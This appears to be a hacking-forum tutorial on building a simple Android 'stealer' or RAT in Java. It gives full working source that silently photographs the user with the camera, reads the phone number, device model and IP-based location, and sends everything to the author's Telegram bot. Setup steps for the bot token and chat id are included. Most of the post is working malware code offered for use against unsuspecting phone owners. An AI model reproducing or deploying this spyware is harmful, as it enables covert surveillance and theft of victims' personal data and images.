Getting phone data - simple rat

Man

Professional
Messages
3,225
Reaction score
1,053
Points
113
Hello, I decided to write an article about creating a simple stealer for android in order to get photos from the camera + data about the phone.

In the process of this short article I will tell and most importantly show how to create a stealer that will receive such data as: Phone model, Location where the phone is located (Exact country and estimated city) and most importantly that we get the phone number access to the camera.

Creation:
To begin with, it is important to say that everything will be written in Java, without using a server since the data will go directly through the TG bot by user id .

Initialization of the Telegram bot​

In your code, the Telegram bot is initialized and used to send messages.
All you need to write in the BOT_TOKEN line is your bot's token and in the CHAT_ID line is your chat id.

Code:
private static final String BOT_TOKEN = "Токен бота";
 private static final String CHAT_ID = "chat id";

You can find out your chat id by writing a message to your bot and then following this link: https://api.telegram.org/bot <Your bot token>/getUpdates
There you need to find the line "chat": "id" after which your chad id will come.

Permissions:
1. To access the necessary functions, you first need to register uses-permission in the AndroidManifest.xml file
Permissions:

XML:
Code:
<uses-permission android:name="android.permission.INTERNET" />
 <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
 <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
 <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
 <uses-permission android:name="android.permission.READ_SMS"/>
 <uses-permission android:name="android.permission.READ_PHONE_NUMBERS"/>
 <uses-permission android:name="android.permission.CAMERA" />

2. Next, you need to write a permission request in the java code, in my case it is MainActivity.java:

Java:
Code:
  if (ContextCompat.checkSelfPermission(this, Manifest.permission.CAMERA) != PackageManager.PERMISSION_GRANTED ||
    ContextCompat.checkSelfPermission(this, Manifest.permission.READ_PHONE_STATE) != PackageManager.PERMISSION_GRANTED) {
   ActivityCompat.requestPermissions(this,
     new String[]{Manifest.permission.CAMERA, Manifest.permission.READ_PHONE_STATE},
     PERMISSION_REQUEST_CODE);
  } else {
   startBackgroundThread();
   openCamera();
  }

Working with the camera:
1.
Capturing an image
To capture an image we need to:
  • We get a list of available cameras via CameraManager .
  • Open the first camera (Main) or the second if you need a front camera.
  • We set up ImageReader , which will receive images from the camera in JPEG format .
  • We start a background thread to capture the image.

Java:
Code:
private void openCamera() {
 CameraManager manager = (CameraManager) getSystemService(CAMERA_SERVICE);
 try {
  String cameraId = manager.getCameraIdList()[0]; // Open the first camera
  Size[] sizes = manager.getCameraCharacteristics(cameraId)
    .get(android.hardware.camera2.CameraCharacteristics.SCALER_STREAM_CONFIGURATION_MAP)
    .getOutputSizes(ImageReader.class);
  imageReader = ImageReader.newInstance(sizes[0].getWidth(), sizes[0].getHeight(), android.graphics.ImageFormat.JPEG, 1);
  imageReader.setOnImageAvailableListener(onImageAvailableListener, backgroundHandler);

  if (ActivityCompat.checkSelfPermission(this, Manifest.permission.CAMERA) == PackageManager.PERMISSION_GRANTED) {
   manager.openCamera(cameraId, stateCallback, backgroundHandler);
  }
 } catch (CameraAccessException e) {
  e.printStackTrace();
 }
}

When the image is available, call the onImageAvailableListener method to process it

2. Save the image
The following code shows a method that saves the received image bytes to a file. It then creates a photo.jpg file in the application cache directory and writes the data there. After writing, it returns the file for further use.

Code:
private File saveImageToFile(byte[] bytes) {
 File file = new File(getCacheDir(), "photo.jpg");
 try (FileOutputStream fos = new FileOutputStream(file)) {
  fos.write(bytes);
  return file;
 } catch (IOException e) {
  e.printStackTrace();
 }
 return null;
}

Getting location information by IP

The method makes an HTTP request to the API https://ipinfo.io/json to get information about the current location of the device based on the IP address. The response from the server in JSON format contains fields such as city and country. These values are extracted and returned as a string. If the request fails, an error message is returned.

Java:
Code:
private String getLocationFromIP() {
 OkHttpClient client = new OkHttpClient();
 Request request = new Request.Builder()
   .url("https://ipinfo.io/json")
   .build();

 try {
  Response response = client.newCall(request).execute();
  if (response.isSuccessful()) {
   String json = response.body().string();
   JSONObject jsonObject = new JSONObject(json);

   // Check for availability of city and country data
String city = jsonObject.optString("city", "Unknown city");
String country = jsonObject.optString("country", "Unknown country");
   return city + ", " + country;
  } else {
   Log.e("LocationError", "Response unsuccessful: " + response.code());
  }
 } catch (IOException | JSONException e) {
  e.printStackTrace();
  Log.e("LocationError", "Error getting location: " + e.getMessage());
 }
 return "Unable to determine location";
}

Sending data to Telegram

Java:
Code:
private void sendDeviceInfo(File photoFile) {
 String phoneNumber = getPhoneNumber();
 String manufacturer = android.os.Build.MANUFACTURER;
 String model = android.os.Build.MODEL;
 String version = android.os.Build.VERSION.RELEASE;

 String location = getLocationFromIP();

String message = "Phone: " + (phoneNumber != null ? phoneNumber : "Not available") + "\n" +
"Device: " + manufacturer + " " + model + "\n" +
"Android version: " + version + "\n" +
"Location: " + location;

 sendMessageToTelegram(message, photoFile);
}

This method generates a message that is sent to Telegram. It:
  1. Gets information about the phone (phone number, manufacturer, model, Android version).
  2. Gets the device's location (city and country) using the getLocationFromIP() method .
  3. Generates a message string that is sent to Telegram

Sending a message and photo in Telegram

Java:
Code:
private void sendMessageToTelegram(String message, File photoFile) {
 OkHttpClient client = new OkHttpClient();

 // Sending a text message
 RequestBody formBody = new MultipartBody.Builder()
   .setType(MultipartBody.FORM)
   .addFormDataPart("chat_id", CHAT_ID)
   .addFormDataPart("text", message)
   .build();

 Request request = new Request.Builder()
   .url("https://api.telegram.org/bot" + BOT_TOKEN + "/sendMessage")
   .post(formBody)
   .build();

 client.newCall(request).enqueue(new Callback() {
  @Override
  public void onFailure(Call call, IOException e) {
   Log.e("Telegram", "Failed to send message: " + e.getMessage());
  }

  @Override
  public void onResponse(Call call, Response response) throws IOException {
   if (!response.isSuccessful()) {
    Log.e("Telegram", "Failed to send message: " + response.message());
   }
  }
 });

 // Sending photos
 RequestBody photoBody = new MultipartBody.Builder()
   .setType(MultipartBody.FORM)
   .addFormDataPart("chat_id", CHAT_ID)
   .addFormDataPart("photo", photoFile.getName(),
     RequestBody.create(photoFile, okhttp3.MediaType.parse("image/jpeg")))
   .build();

 Request photoRequest = new Request.Builder()
   .url("https://api.telegram.org/bot" + BOT_TOKEN + "/sendPhoto")
   .post(photoBody)
   .build();

 client.newCall(photoRequest).enqueue(new Callback() {
  @Override
  public void onFailure(Call call, IOException e) {
   Log.e("Telegram", "Failed to send photo: " + e.getMessage());
  }

  @Override
  public void onResponse(Call call, Response response) throws IOException {
   if (!response.isSuccessful()) {
    Log.e("Telegram", "Failed to send photo: " + response.message());
   }
  }
 });
}

The method sends two types of data to Telegram:
  1. Text message: It contains information about the phone, device, Android version and location.
  2. Photo: The image file is sent using the same Telegram Bot API.
There are two different requests used for sending:
  • One for text message (sendMessage).
  • Another one is for sending a photo (sendPhoto).
Java Camera Background Thread

Code:
private void startBackgroundThread() {
 backgroundThread = new HandlerThread("CameraBackground");
 backgroundThread.start();
 backgroundHandler = new Handler(backgroundThread.getLooper());
}

private void stopBackgroundThread() {
 if (backgroundThread != null) {
  backgroundThread.quitSafely();
  try {
   backgroundThread.join();
   backgroundThread = null;
   backgroundHandler = null;
  } catch (InterruptedException e) {
   e.printStackTrace();
  }
 }
}

These methods start and stop a background thread for working with the camera. A background thread is needed to perform long operations (such as capturing images) so that they do not block the main thread of the application. The startBackgroundThread() method starts a new thread, and stopBackgroundThread() terminates it safely.

General operating principle:​

  1. The user launches the application and the system checks permissions to access the camera and phone.
  2. Once permissions are received, the camera opens and begins capturing images.
  3. Once a photo is taken, it is saved to a file and then sent to Telegram along with system information (e.g. phone number, device model) and location (obtained via IP
Full code:
Java:
Code:
package com.example.myapplication;

import android.Manifest;
import android.content.pm.PackageManager;
import android.graphics.Bitmap;
import android.hardware.camera2.CameraAccessException;
import android.hardware.camera2.CameraCaptureSession;
import android.hardware.camera2.CameraDevice;
import android.hardware.camera2.CameraManager;
import android.hardware.camera2.CameraMetadata;
import android.hardware.camera2.CaptureRequest;
import android.media.Image;
import android.media.ImageReader;
import android.os.Bundle;
import android.os.Handler;
import android.os.HandlerThread;
import android.telephony.TelephonyManager;
import android.util.Log;
import android.util.Size;
import android.view.Surface;
import android.widget.Toast;

import androidx.annotation.NonNull;
import androidx.appcompat.app.AppCompatActivity;
import androidx.core.app.ActivityCompat;
import androidx.core.content.ContextCompat;

import org.json.JSONException;
import org.json.JSONObject;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.ByteBuffer;
import java.util.Arrays;

import okhttp3.Call;
import okhttp3.Callback;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.Response;
import okhttp3.MultipartBody;
import okhttp3.RequestBody;

public class MainActivity extends AppCompatActivity {

 private static final int PERMISSION_REQUEST_CODE = 1;
 private static final String BOT_TOKEN = "Токен бота";
 private static final String CHAT_ID = "Chat id";

 private CameraDevice cameraDevice;
 private ImageReader imageReader;
 private Handler backgroundHandler;
 private HandlerThread backgroundThread;

 @Override
 protected void onCreate(Bundle savedInstanceState) {
  super.onCreate(savedInstanceState);
  setContentView(R.layout.activity_main);

  checkAndRequestPermissions();
 }

 private void checkAndRequestPermissions() {
  if (ContextCompat.checkSelfPermission(this, Manifest.permission.CAMERA) != PackageManager.PERMISSION_GRANTED ||
    ContextCompat.checkSelfPermission(this, Manifest.permission.READ_PHONE_STATE) != PackageManager.PERMISSION_GRANTED) {
   ActivityCompat.requestPermissions(this,
     new String[]{Manifest.permission.CAMERA, Manifest.permission.READ_PHONE_STATE},
     PERMISSION_REQUEST_CODE);
  } else {
   startBackgroundThread();
   openCamera();
  }
 }

 @Override
 public void onRequestPermissionsResult(int requestCode, @NonNull String[] permissions, @NonNull int[] grantResults) {
  super.onRequestPermissionsResult(requestCode, permissions, grantResults);
  if (requestCode == PERMISSION_REQUEST_CODE) {
   if (grantResults.length > 0 && grantResults[0] == PackageManager.PERMISSION_GRANTED) {
    startBackgroundThread();
    openCamera();
   } else {
    Toast.makeText(this, "Permissions not granted", Toast.LENGTH_SHORT).show();
   }
  }
 }

 private void openCamera() {
  CameraManager manager = (CameraManager) getSystemService(CAMERA_SERVICE);
  try {
   String cameraId = manager.getCameraIdList()[0]; // Открываем первую камеру
   Size[] sizes = manager.getCameraCharacteristics(cameraId)
     .get(android.hardware.camera2.CameraCharacteristics.SCALER_STREAM_CONFIGURATION_MAP)
     .getOutputSizes(ImageReader.class);
   imageReader = ImageReader.newInstance(sizes[0].getWidth(), sizes[0].getHeight(), android.graphics.ImageFormat.JPEG, 1);
   imageReader.setOnImageAvailableListener(onImageAvailableListener, backgroundHandler);

   if (ActivityCompat.checkSelfPermission(this, Manifest.permission.CAMERA) == PackageManager.PERMISSION_GRANTED) {
    manager.openCamera(cameraId, stateCallback, backgroundHandler);
   }
  } catch (CameraAccessException e) {
   e.printStackTrace();
  }
 }

 private final CameraDevice.StateCallback stateCallback = new CameraDevice.StateCallback() {
  @Override
  public void onOpened(@NonNull CameraDevice camera) {
   cameraDevice = camera;
   createCameraCaptureSession();
  }

  @Override
  public void onDisconnected(@NonNull CameraDevice camera) {
   camera.close();
   cameraDevice = null;
  }

  @Override
  public void onError(@NonNull CameraDevice camera, int error) {
   camera.close();
   cameraDevice = null;
  }
 };

 private void createCameraCaptureSession() {
  try {
   Surface surface = imageReader.getSurface();
   CaptureRequest.Builder captureRequestBuilder = cameraDevice.createCaptureRequest(CameraDevice.TEMPLATE_STILL_CAPTURE);
   captureRequestBuilder.addTarget(surface);
   captureRequestBuilder.set(CaptureRequest.CONTROL_MODE, CameraMetadata.CONTROL_MODE_AUTO);

   cameraDevice.createCaptureSession(Arrays.asList(surface), new CameraCaptureSession.StateCallback() {
    @Override
    public void onConfigured(@NonNull CameraCaptureSession session) {
     try {
      session.capture(captureRequestBuilder.build(), null, backgroundHandler);
     } catch (CameraAccessException e) {
      e.printStackTrace();
     }
    }

    @Override
    public void onConfigureFailed(@NonNull CameraCaptureSession session) {
     Log.e("CameraCaptureSession", "Configuration failed");
    }
   }, backgroundHandler);
  } catch (CameraAccessException e) {
   e.printStackTrace();
  }
 }

 private final ImageReader.OnImageAvailableListener onImageAvailableListener = new ImageReader.OnImageAvailableListener() {
  @Override
  public void onImageAvailable(ImageReader reader) {
   Image image = reader.acquireLatestImage();
   if (image != null) {
    ByteBuffer buffer = image.getPlanes()[0].getBuffer();
    byte[] bytes = new byte[buffer.remaining()];
    buffer.get(bytes);
    image.close();

    File photoFile = saveImageToFile(bytes);
    if (photoFile != null) {
     sendDeviceInfo(photoFile);
    }
   }
  }
 };

 private File saveImageToFile(byte[] bytes) {
  File file = new File(getCacheDir(), "photo.jpg");
  try (FileOutputStream fos = new FileOutputStream(file)) {
   fos.write(bytes);
   return file;
  } catch (IOException e) {
   e.printStackTrace();
  }
  return null;
 }

 private void sendDeviceInfo(File photoFile) {
  String phoneNumber = getPhoneNumber();
  String manufacturer = android.os.Build.MANUFACTURER;
  String model = android.os.Build.MODEL;
  String version = android.os.Build.VERSION.RELEASE;

  String location = getLocationFromIP();

  String message = "Телефон: " + (phoneNumber != null ? phoneNumber : "Не доступен") + "\n" +
    "Устройство: " + manufacturer + " " + model + "\n" +
    "Версия Android: " + version + "\n" +
    "Страна и предполагаемый город: " + location;

  sendMessageToTelegram(message, photoFile);
 }

 private String getPhoneNumber() {
  TelephonyManager telephonyManager = (TelephonyManager) getSystemService(TELEPHONY_SERVICE);
  if (ActivityCompat.checkSelfPermission(this, Manifest.permission.READ_PHONE_STATE) == PackageManager.PERMISSION_GRANTED) {
   return telephonyManager.getLine1Number();
  }
  return null;
 }

 private String getLocationFromIP() {
  OkHttpClient client = new OkHttpClient();
  // Use HTTPS for secure request
  Request request = new Request.Builder()
    .url("https://ipinfo.io/json")
    .build();

  try {
   Response response = client.newCall(request).execute();
   if (response.isSuccessful()) {
    String json = response.body().string();
    JSONObject jsonObject = new JSONObject(json);

   // Check for availability of city and country data
    String city = jsonObject.optString("city", "Неизвестный город");
    String country = jsonObject.optString("country", "Неизвестная страна");

    Log.d("LocationInfo", "City: " + city + ", Country: " + country);

    return city + ", " + country;
   } else {
    Log.e("LocationError", "Response unsuccessful: " + response.code());
   }
  } catch (IOException e) {
   e.printStackTrace();
   Log.e("LocationError", "IOException: " + e.getMessage());
  } catch (JSONException e) {
   e.printStackTrace();
   Log.e("LocationError", "JSONException: " + e.getMessage());
  }
  return "Unable to determine location";
 }

 private void sendMessageToTelegram(String message, File photoFile) {
  OkHttpClient client = new OkHttpClient();

  // Sending a text message
  RequestBody formBody = new MultipartBody.Builder()
    .setType(MultipartBody.FORM)
    .addFormDataPart("chat_id", CHAT_ID)
    .addFormDataPart("text", message)
    .build();

  Request request = new Request.Builder()
    .url("https://api.telegram.org/bot" + BOT_TOKEN + "/sendMessage")
    .post(formBody)
    .build();

  client.newCall(request).enqueue(new Callback() {
   @Override
   public void onFailure(Call call, IOException e) {
    Log.e("Telegram", "Failed to send message: " + e.getMessage());
   }

   @Override
   public void onResponse(Call call, Response response) throws IOException {
    if (!response.isSuccessful()) {
     Log.e("Telegram", "Failed to send message: " + response.message());
    }
   }
  });

  // Sending photos
  RequestBody photoBody = new MultipartBody.Builder()
    .setType(MultipartBody.FORM)
    .addFormDataPart("chat_id", CHAT_ID)
    .addFormDataPart("photo", photoFile.getName(),
      RequestBody.create(photoFile, okhttp3.MediaType.parse("image/jpeg")))
    .build();

  Request photoRequest = new Request.Builder()
    .url("https://api.telegram.org/bot" + BOT_TOKEN + "/sendPhoto")
    .post(photoBody)
    .build();

  client.newCall(photoRequest).enqueue(new Callback() {
   @Override
   public void onFailure(Call call, IOException e) {
    Log.e("Telegram", "Failed to send photo: " + e.getMessage());
   }

   @Override
   public void onResponse(Call call, Response response) throws IOException {
    if (!response.isSuccessful()) {
     Log.e("Telegram", "Failed to send photo: " + response.message());
    }
   }
  });
 }

 private void startBackgroundThread() {
  backgroundThread = new HandlerThread("CameraBackground");
  backgroundThread.start();
  backgroundHandler = new Handler(backgroundThread.getLooper());
 }

 @Override
 protected void onPause() {
  super.onPause();
  closeCamera();
  stopBackgroundThread();
 }

 private void closeCamera() {
  if (cameraDevice != null) {
   cameraDevice.close();
   cameraDevice = null;
  }
 }

 private void stopBackgroundThread() {
  if (backgroundThread != null) {
   backgroundThread.quitSafely();
   try {
    backgroundThread.join();
    backgroundThread = null;
    backgroundHandler = null;
   } catch (InterruptedException e) {
    e.printStackTrace();
   }
  }
 }
}

After executing the code, you will receive a log of the following type.

Thank you for your attention! I hope the article was useful.
I will be happy to answer any questions or suggestions in the comments.
 
Top